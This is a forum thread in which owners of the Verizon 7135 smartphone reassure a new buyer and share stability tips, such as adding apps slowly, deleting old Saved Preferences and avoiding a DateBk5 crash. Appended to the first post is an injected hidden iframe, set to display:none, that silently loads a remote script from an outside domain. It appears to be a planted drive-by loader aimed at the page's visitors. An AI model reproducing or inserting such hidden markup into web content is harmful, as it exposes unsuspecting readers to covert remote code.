+ Reply to Thread
Page 1 of 2 1 2 LastLast

Any happy new Verizon 7135 users?

My new Verizon 7135 is scheduled to arrive tomorrow via FedEx. Reading all of these 7135 issues is really discouraging. I'm already wondering if I should take the risk on a severly unstable, unreliable phone.

Is there anyone who owns a new Verizon 7135 that has had minimal problems? If you exist, hearing from you folks would make me feel better about my purchase.

Also, can anyone can provide a comprehnsive, clear list of things to do or not to that would help minimize issues I may experience? I have read many of the posts here but have not seen a comprehensive list of current for new Verizon 7135s fixes.

Thanks for any help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm getting mine today or tommorow. I agree with what your asking, because there's been much debate on this board about LauncherX and other palm app launchers.

You're reading a lot of forum discussion from people trying to do all sorts of things with their 7135. Of course there are going to be bugs they uncover, but your quote of "severly unstable, unreliable phone" is a bit of an exaggeration! I've had mine for several weeks and absolutely love it! It is incredible what can be done with it. Do your homework and learn to do backup's and use Backup Buddy and you'll be fine. I finally crashed mine after a couple weeks of installing all sorts of applications (it crashed after I loaded TakePhone). I use Launcher X and it seems to be working fine.

I would guess there are 100's if not 1000's of happy users.

I LOVE my 7135. And LauncherX works fine. It hasn't given me any problems at all yet. (knock on wood)

Im also running:

TakePhone
    BackupBuddy
    DirectoryAssistant
    BigClock
    AcidImage
    moviefone pqa
    AWS weather pqa
    SimCity

Ive had 3 fatal exceptions, but two happened when I closed the phone while an app was trying to do somthing. The other was random. But Ive been going 3 days since with no probs.
    "Why all the pearls, why the blue hair, why anything!?"

Re: Any happy new Verizon 7135 users?

Originally posted by ncsportsman
    My new Verizon 7135 is scheduled to arrive tomorrow via FedEx. Reading all of these 7135 issues is really discouraging. I'm already wondering if I should take the risk on a severly unstable, unreliable phone.

Is there anyone who owns a new Verizon 7135 that has had minimal problems? If you exist, hearing from you folks would make me feel better about my purchase.

Also, can anyone can provide a comprehnsive, clear list of things to do or not to that would help minimize issues I may experience? I have read many of the posts here but have not seen a comprehensive list of current for new Verizon 7135s fixes.

Thanks for any help!
    me

I've had mine for a couple weeks. Besides a couple "fatal Exceptions", I really like the phone. I'm using MegaLauncher. I keep my 256 SD card in with pics, mp3's and backup buddy. I've loaded several games and DateBk5.

So far, so good.
    Gadgetman

I got mine a few months ago, I love it and have had very few problems with it. I have had to do only occaisional resets. I think the trick to 7135 succes is to remeber its really just a cell phone with a palm. A lot of what I read is from people who are using it as and expecting it to act like a pentium 4 desktop. It's not. It's just a cell phone with a palm built in. I wouldn't give it up for the world!

I'm a Verizon customer, Pittsburgh PA, and got my
    phone last week. I've had minimal problems, and
    the compatibility with stuff I had loaded on my
    6035 for the last two years is remarkably good.
    The connection and download speed is clearly
    superior to the 6035 (which is a bit hard to
    understand, since it's the same data rate).

Good luck -

-BS

More then happy

I have had my 7135 for about two weeks now and have only had one soft reset. Upgraded to Quick Office Premiere and put on a new mileage and expense program. No problems. Palm and phone get steady use each day and battery is lasting two days before I even think about recharging. It does get some charge while on the road from home to the office because I like using the voice activated dialing and you need to have it plugged in for that to work. My phone was direct from Verizon.

I've had my 7135 for about 2 weeks as well, got it B2B. I really love it, I have had no problems except for the "fatal Exceptions" which occur mostly when I swap out the battery and once or twice when I've ejected the SD card. I have noticed that I do miss the Jog Dail button as a way oif getting a phone number fast, and I've also noticed that I use the Stylis loads more than with the 6035. Other than that I'm still trying to figure out what programs I want to run.

cheers,

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

can anyone can provide a comprehnsive, clear list of things to do or not to that would help minimize issues I may experience? I
    Numero Uno, be sure to delete your "Saved Preferences" file if you had been using a 6035, before you sync your 7135 for the first time. (Read the directions included with the phone.)

Numero Two-o, add new programs s-l-o-w-l-y. Give the 7135 some use and time to sort out conflicts. If you add a couple of dozen programs all at once you are inviting trouble and making it more difficult to find the one program that may be screwing everything up.

7135 is great!

I've had my 7135 for a couple of weeks now. I love it. I've only had one unexplained problem, and it's only occured once. The little LCD next to the antenna became corrupted and started flashing and scrolling individual pixels. It hasn't happened since I hit reset. I'm still finding new things on the unit. It's a great smartphone.

Well, I've had mine for almost a week, and not had a single crash (soft or hard reset). After reading about the problems reported on this forum, I have been going very slow with mine. For instance, I'm only running two "foreign" applications (City Time and RPN), and haven't yet loaded a launcher, even. Oh, I forgot, today, I loaded OAG Mobile, which looks totally cool...

I can be patient--there's so much stuff to play with here in the basic unit! I used to think I was at least slightly cool, but this product has made it clear to me that I am a pathetic techno-geek. I've actually demonstrated it to strangers in queues with me. I'm thinking of divorcing my wife of 30 years, and marrying my phone.

St

It was >fun< getting the phone from Verizon but I've had it for a week now and am quite happy with it. One soft reset. No probs!
    Milt

Love it!

I got mine last Friday and love it. Have I had some crashes? Yes, but not really any more than I've had with previous Palm's (Palm III and Handspring Visor) over the years. I've loaded a TON of stuff on this thing and am amazed at the quality of the apps out there.

So far:

- PalmVNC (amazing to be able to control my home Win2k desktop from my Smartphone while sitting in a meeting)
    - Docs to Go
    - Beyond Contacts (new release today!)
    - Marathon (runner's diary)

It will take months to learn everything this thing can do and the best way to use it.

Get one and get started now!

no_bones

I'm in NC and have had mine for 2 weeks. No problems large or small at all. I kept my 6035 just in case I had to reactivate it. But no way would I ever go back. I don't use Launcherx, but I do use Docs to Go. I have downleaded pictures and music and games. I am on a 500 miute month plan and I always have battery power left over at night.

ep
    I'm definitely a power user and have taxed my 7135 to the max over the past couple of weeks. It is much snappier then my 6035 and just so cool.

I have done a hard reset once because I tried (just for grins and giggles) just restoring all my 6035 stuff to the phone. Needless to say, there were quite a few files that shouldn't be on the 7135 from the 6035.

Afterwards, just did what I was expecting to have to do, carefully installing programs.

I had to re-format my SD card in the palm. I had formatted it on my system and put MP3's on it a couple of months ago. When I loaded a bunch of pictures on it, the filesystem was corrupted. So, I opted at reformatting via the palm.

Very stable and good for me. My wishlist for this phone is short, everything is good.
    --ep

I've had my 7135 for only two days, and I love it. I have managed to transfer everything from my Palm IIIc into it with minimal problems. Have only had a couple of soft resets happen, I think because of something I was trying to do, but not sure. Everything is going very well. I do have to call Verizon support to find out why I cannot get any of the browsers or my Email to work. Probably will do that today. All in all, it's great!
    Michael

Thanks for any help!
    ncsportsman: I've had mine mine for over 2 months now (2-22) and if I had to drive that 250 miles again and pay over $500 like I did I would do it all over again. Yes, I've had a need several times to do a soft reset (knock on wood...never a hard reset) but I am ok with that. I'm not a "power user" like a lot of our members but I'm very satisfied to have a phone (that works great) and a Palm (that keeps track of my calendar and contacts) and a nice entertainment device (games, MP3s, pics, ebooks, etc.) The best thing about getting a 7135 is this board. If you have any questions they even have been helpful to "Iowans Everywhere". I have not regretted getting my baby once!
    Best of luck to you! ---dmiowa

Walked into a Verizon store in Cincinnati on Tuesday (4/22) and received it Wednesday (4/23) via FedEx. So far so good. I still need to load all my Palm apps but do have DateBK5 installed. I was able to create a Fatal Error/Soft Reset. Try this. With DateBK5 running, press and hold the phone on/off button as if turning the phone on or off. Gives me a fatal error and requires a soft reset. Basically, to avoid this, I press and release the phone on/off button to activate the phone app, then press and hold to power on of off the phone. No errors. I have some more apps to load and check out and hope give me no problems because I love this phone.